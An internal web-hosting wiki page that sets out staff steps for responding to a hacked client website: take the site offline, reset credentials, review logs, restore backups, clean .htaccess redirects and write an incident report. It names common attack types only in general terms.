Hacking Incident Guidelines

From WebFocus Wiki Site
Jump to: navigation, search


1. Immediately upload an under development page and rename the existing directory. **Do not overwrite and create a new directory.

2. Get the authorized email of all involved parties and advise our client about the 24hour investigation period. **Sales consultant, authorized contact info, support@servobox.com

3. Verify if the hacked site is already tagged in google’s database otherwise move to step 5. Usually it may look like the below image.


4. If tagged, login through shc.security@gmail.com in google’s web master tool then add it on our list of managed sites and run a review. **Follow google’s instruction on how to add a site. The review will normally take more than 8 hours and the technical in-charge should closely monitor any progress as the review may take less than 8 hours.

5. For security purposes we need to reset all hosting credentials (control panel and ftp) and send it to the authorized email address. **Ask the client if the authorized email is valid and if not coordinate with customer care to verify.

6. Now, verify what type of hacking technique was used to deface the website.

a. Create a sub-domain and use hcks3r.domain.com as a standard hacked site name.

b. Move all files on the created sub-domain.

c. Upload a robots.txt file in their root directory that contains the ff:


7. Look for the compromised file or indexes (index.php, index.html, _about.html, or any other suspicious looking files) and check if when it was modified. Then verify the date modify and take note of it. Now go to our server logs and usually found together with the domain directory.

8. Browse through the domain’s web logs usually found together with the domain directory on their FTP. Analyze the date modification of files and check all traces like IP addresses or any significant information that will point out the identity of the hacker.

Types of Hacking:

a. FTP password theft

b. Remote File Inclusion Attacks (RFI)

c. Local File Inclusion attackes (LFI)

d. SQL injection attacks

e. Password attacks

f. Form mail spamming

Refer to this url: http://25yearsofprogramming.com/blog/2008/20080311.htm

The more common methods used to hack websites include:

• Hacked cPanel or FTP password

• Code injection - http://en.wikipedia.org/wiki/Code_injection

• Remote File Inclusion - http://en.wikipedia.org/wiki/Remote_File_Inclusion

9. How do you fix the website that is hacked? It is difficult to give an exact method to resolve a hacking issue as there are many different types of website hacks, here are some general steps to take to correct the website:

a. Restore backup of your website. The easiest way is to restore your site from a version that was saved prior to the site being hacked.

b. Remove the coding from the .htaccess file. Many times if the site is hacked by code injection, there will be a "re-direct" placed in your .htaccess file in your public_html folder. Open your .htaccess file and look for any lines of coding that look suspicious. Delete the suspicious lines of coding, and then save your changes.

10. How to prevent the site from being hacked.

Depending on the cause of the hack, there are some steps you can take to help prevent hacks in the future:

a. Change any passwords for your account. This is already mentioned in step 5. This is always the recommended first step. In case your passwords were compromised, change your hsphere password, FTP accounts and your CMS (joomla, wordpress, etc.)

b. Update web applications running on their hosting account. Much of our clients are using third party software like Joomla, Wordpress and a lot more and make sure they are using the most up to date version as security exploits may have been fixed by the developers.

c. Update all web development programs running on the web developer/clients computer. Ask the client/developer if they are using adobe products such as flash or dreamweaver. Tell them to scan regularly their workstation using the most updated virus definition on their anti-virus software.

11. You may now generate an initial report. Refer to this file IR_domain.docx found in \\orion\data\technical support\Reports\Hacking **Make sure to save the document into the correct date and folder.

12. Send a copy first to your respective team leader to verify the report then the consultant will be forwarding the results to our client. **Generate a PDF format report.